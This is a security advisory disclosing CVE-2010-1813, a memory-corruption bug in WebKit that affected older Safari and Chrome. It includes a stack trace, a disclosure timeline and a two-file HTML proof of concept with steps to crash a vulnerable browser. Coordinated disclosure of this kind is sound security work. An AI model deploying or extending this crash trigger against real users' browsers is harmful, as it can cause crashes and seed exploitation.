Webkit Memory Corruption

                							

                TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY
TESTED OS: WINDOWS XP SP3
SEVERITY: HIGH
CVE-NUMBER: CVE-2010-1813
DISCOVERED DATE: 2010-06-29
FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)
FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2
DISCOVERED BY: JOSE A. VAZQUEZ
 
======ABOUT APPLICATION======
 
"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version
of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and
JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/
 
======DESCRIPTION======
 
A memory corruption vulnerability was confirmed by Chromium Security Team. Original stacktrace showed a null ptr
dereference, but some pointers were also corrupted.
 
Stacktrace (using Chrome symbols):
 
WebCore::RenderObject::containingBlock()  Line 597
WebCore::RenderBlock::paintContinuationOutlines()  Line 2344
WebCore::RenderBlock::paintObject()  Line 2232
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2447
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebCore::RenderWidget::paint()  Line 281
WebCore::InlineBox::paint()  Line 180
WebCore::InlineFlowBox::paint()  Line 682
WebCore::RootInlineBox::paint()  Line 167
WebCore::RenderLineBoxList::paint()  Line 219
WebCore::RenderBlock::paintContents()  Line 2090
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderBlock::paintChildren()  Line 2127
WebCore::RenderBlock::paintContents()  Line 2092
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2445
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebKit::WebFrameImpl::paintWithContext()  Line 1795
WebKit::WebFrameImpl::paint()  Line 1818
WebKit::WebViewImpl::paint()  Line 979
RenderWidget::PaintRect()  Line 390
RenderWidget::DoDeferredUpdate()  Line 501
RenderWidget::CallDoDeferredUpdate()  Line 428
 
 
======PROOF OF CONCEPT======
 
File 1.html:
 
<meta http-equiv="refresh" content="1;URL=1.html" >
<iframe src="2.html"></iframe>
 
File 2.html:
 
<dialog style='position:relative'>
 <h style='outline-style:auto'>X<div></div></h>
</dialog>
 
 
======STEPS TO REPRODUCE======
 
1.- Upload 1.html and 2.html to your server.
2.- Open file 1.html with vulnerable app.
 
-Google Chrome:
 
3.- Wait for a while, then, crash is got (sad-tab).
 
-Apple Safari:
 
3.- Wait for a while, if crash is not got, use Ctrl+T to trigger it.
  
 
 
======REFERENCES======
 
[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373
[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html
[ref-3] -> http://support.apple.com/kb/HT4334
[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html
 
 
======DISCLOSURE TIMELINE======
 
Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)
 
[2010-06-29] => Posted new issue in Chromium Project (with pocs).
[2010-06-29] => Chromium confirmed memory corruption and opened new webkit bug.
[2010-07-26] => Chromium released new fix (Google Chrome 5.0.375.125).
[2010-09-08] => Apple released new fix (Apple Safari 4.1.2/5.0.2).
[2010-09-10] => Public disclosure.
 
 
======CREDITS=======
 
Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/

<p>